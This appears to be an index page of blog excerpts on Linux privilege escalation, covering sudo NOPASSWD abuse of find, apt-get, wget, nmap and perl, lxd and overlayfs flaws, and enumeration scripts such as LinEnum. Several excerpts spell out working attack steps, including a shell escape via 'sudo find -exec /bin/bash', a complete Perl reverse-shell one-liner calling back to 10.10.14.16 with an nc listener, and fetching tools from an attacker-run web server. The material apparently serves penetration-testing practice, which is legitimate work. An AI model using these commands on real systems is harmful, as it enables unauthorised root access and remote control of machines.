Restricted shells are conceptually shells with restricted permissions, with features and commands working under a very peculiar environment, built to keep users in a secure and controlled environment, allowing them just the minimum necessary to perform their daily operations. Once hackers get a low privileged shell, even a restricted one, Read more…
LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead. LXD is Ubuntu’s container manager utilizing Linux containers. It could be considered to act in the same sphere as Docker, The lxd group should be considered harmful in Read more…
The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount Read more…
chkrootkit is a tool to locally check for signs of a rootkit (http://www.chkrootkit.org/). It contains: chkrootkit: a shell script that checks system binaries for rootkit modification. ifpromisc.c: checks if the network interface is in promiscuous mode. chklastlog.c: checks for lastlog deletions. chkwtmp.c: checks for wtmp deletions. check_wtmpx.c: checks for wtmpx Read more…
HT is a file editor/viewer/analyzer for executables. The goal is to combine the low-level functionality of a debugger and the usability of IDEs. We plan to implement all (hex-)editing features and support of the most important file formats. Exploit 1. Check what sudo permission the current user has, desired “NOPASSWD” Read more…
wget is a free utility for non-interactive download of files from the Web. It supports HTTP, HTTPS, and FTP protocols, as well as retrieval through HTTP proxies. If you get access to use with root privileges it can be harmful. sudo -l Hacking steps 1. wget has the capability of Read more…
Laravel is a web application framework with expressive, elegant syntax. https://www.easylaravelbook.com/blog/introducing-the-laravel-5-command-scheduler/ https://laravel.com/docs/5.8/scheduling#scheduling-artisan-commands The Laravel command scheduler allows you to manage your task execution dates and times using easily understandable PHP syntax. You’ll manage the task execution definitions in app/Console/Kernel.php Scheduling Your Command As was perhaps made obvious by the earlier Read more…
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. https://owasp.org/www-community/attacks/Command_Injection The cron daemon is a long-running process that executes commands at specific dates and times. For commands that need to be executed repeatedly (e.g., hourly, daily, Read more…
Magic numbers are the first bits of a file which uniquely identify the type of file. it can be helpful to look for file format signatures and inferring how the application is using them based on these signatures, as well as how these formats may be abused to provoke undefined Read more…
find Linux command can help us escape from a restricted shell, if you get to run the program with higher privileges, like NOPASWD entry in /etc/sudoers. How to 1. sudo -l 2. find . -exec /bin/bash \;
Sudo (NOPASSWD) service – Privilege Escalation If you ever get to run “service” command with root privileges, you can escape from restricted shell to root. In this example /etc/sudoers has allowed an user to run this program as root without password need. How to 1. sudo -l 2. Now that Read more…
apt-get – Privilege escalation apt-get can be used to escalate privileges when sudo is allowed without password. How to 1. check the permissions this user has sudo -l We can see that /usr/bin/apt-get is allowed (NOPASSWD) 2. get into changelog documentation sudo apt-get changelog apt 3. At the bottom type Read more…
LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. https://github.com/mzet-/linux-exploit-suggester Execute 1. Download the tool git clone https://github.com/mzet-/linux-exploit-suggester.git cd ls 2. Start python web server python -m SimpleHTTPServer 9999 3. Download the script into the server wget http://10.10.14.16:9999/linux-exploit-suggester chmod a+x linux-exploit-suggester ./ linux-exploit-suggester For Read more…
The art of privilege escalation is a skill that any competent hacker should possess. It’s an entire field unto itself, and while it’s good to know how to perform the techniques involved manually, it’s often more efficient to have a script automate the process. LinEnum is one such script that Read more…
This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits. https://github.com/sleventyeleven/linuxprivchecker Execution 1. Download the script into Parrot/Kali machines git clone https://github.com/sleventyeleven/linuxprivchecker.git cd linuxprivchecker ls Read more…
Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps http://pentestmonkey.net/tools/audit/unix-privesc-check https://github.com/pentestmonkey/unix-privesc-check Execute 1. Download the file into Kali/Parrot Read more…
Using Pearl to elevate privileges using a reverse shell. Exploit 1. Check sudo permissions sudo -l 2. Start a listener on Kali/Parrot nc -lvnp 4445 3. run perl using sudo as no password is required. sudo /usr/bin/perl -e ‘use Socket;$i=”10.10.14.16″;$p=4445;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ 4. Check on the listener whoami
Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation. Exploit 1 1. Check what sudo permission the current user has, desired “NOPASSWD” sudo -l 2. Execute Nmap in interactive mode sudo nmap Read more…